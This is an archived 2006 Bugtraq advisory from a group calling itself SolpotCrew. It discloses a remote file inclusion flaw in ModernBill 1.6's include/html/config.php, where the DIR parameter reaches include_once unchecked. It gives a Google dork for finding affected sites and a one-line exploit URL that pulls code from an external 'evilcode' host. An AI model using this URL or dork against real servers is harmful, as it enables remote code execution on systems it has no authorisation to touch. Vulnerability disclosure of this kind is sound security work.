bugtraq - SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion

lists.openwall.net		lists / announce john-users owl-users popa3d-users / xvendor oss-security / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4
Open Source and information security mailing list archives

This website is powered by Openwall GNU/*/Linux security-enhanced OS

[<prev] [next>] [thread-next>] [month] [year] [list]

Date: 3 Aug 2006 14:29:51 -0000
From: chris_hasibuan@...oo.com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File
 Inclusion

#############################SolpotCrew Community################################ 
# 
# modernbill ver 1.6 (DIR) Remote File Inclusion 
# 
# Download file : http://freshmeat.net/projects/modernbill/
# 
################################################################################# 
# 
# 
# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)
# 
# contact: chris_hasibuan@...oo.com 
# 
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
# 
################################################################################ 
# 
# 
# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , 
# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy
# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu
# and all crew #mardongan @ irc.dal.net 
# 
# 
############################################################################### 
Input passed to the "DIR" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources. 

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE######################### 
######################################E.O.F##################################